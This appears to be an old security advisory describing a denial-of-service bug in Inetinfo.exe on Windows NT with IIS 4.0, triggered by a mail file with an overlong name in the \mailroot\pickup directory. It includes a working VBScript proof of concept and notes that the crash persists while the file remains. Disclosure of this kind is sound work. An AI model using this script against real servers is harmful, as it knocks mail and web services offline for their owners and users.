COMMAND

    Inetinfo.exe

SYSTEMS AFFECTED

    WinNT

PROBLEM

    Valentijn found following.  He found how to crash Inetinfo.exe  by
    using a longfilename in  the \mailroot\pickup directory.   Use the
    example script / Create a valid mail file named at least 86  chars
    and a .txt.eml extension.  Example:

        <one line>GGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJTHJQVGNHZNYXMrad38A88.tmp.eml</one line>)

    and place it in \pickup directory.

    Possible cause of  this may be  that you simply  shouldn't do this
    or LFN are not supported?  This was tested on Windows NT Server
    4.0 with IIS 4.0 (all servicepacks applied),

    Valentijn  was  writing  a  bulk  mailinglist  for  some customers
    (mainly newspapers not spamware).  For speeding up the process  he
    choose to  make separate  text files  (scripting.filesystemobject)
    and place them in the mailroot\pickup directory.  While generating
    filenames he came across  a crashing Inetinfo.exe with  Dr. Watson
    saying 'oooh behave....' Access  violation!  When using  filenames
    longer than 80 characters.

    This  bug  is  not  a  directly  dangerous  for  IIS  users.  Some
    webhosting companys  offer the  use of  the defaul  mail component
    cdonts.newmail  which  essentially  makes  a  ascii file with some
    mailheaders and places it in the \mailroot\pickup directory.  This
    directory   is   constantly   monitored   by   the  smtpserver  in
    inetinfo.exe and start parsing the  message in the queue for  smtp
    delivery.

    While  you  can  secure  the  \mailroot\queue  directory with some
    access setting (system:F admins:F) the \mailroot\pickup  directory
    needs to be writeable for every W3user (anonymous) in order to use
    the cdonts.newmail object (it will error with permission denied if
    \mailroot\pickup is not writeable).

    A user using  the script under  here will need  to know the  exact
    location of the \mailroot\pickup directory.

    Example script:

    ' PLEASE PROVIDE YOUR PICKUP PATH HERE
    Rootpath = "c:\inetpub\mailroot\pickup\"
    
             Set fso = createobject("scripting.filesystemobject")
             Thename = Createkey & fso.GetTempName & ".eml"
             Set Thefile =  fso.GetFolder(rootpath).CreateTextFile(TheName)
                     Thefile.writeline "X-Sender: CRASHTHIS@my.net"
                     Thefile.writeline "X-Receiver: dump@my.net"
                     Thefile.writeline "From: <CRASHTHIS@my.net>"
                     Thefile.writeline "To: <dump@my.net>"
                     Thefile.writeline "Subject: MINE DID NOT CRASH"
                     Thefile.writeline "Date: " & now()
                     Thefile.writeline "X-Generator: " & Thename
             Thefile.close
             Set thefile = nothing
             Thename = ""
    
    Function Createkey
             for z = 1 to 80
                             randomize
                             a =     Int((25 * Rnd) + 1)
                             password = password & chr(a+65)
             next
             Createkey = password
    end function

    Warning: IF  InetInfo.exe crashes  it cannot  be started  again as
    long as the file is still there!

SOLUTION

    None.  Doesn't work on Win2000.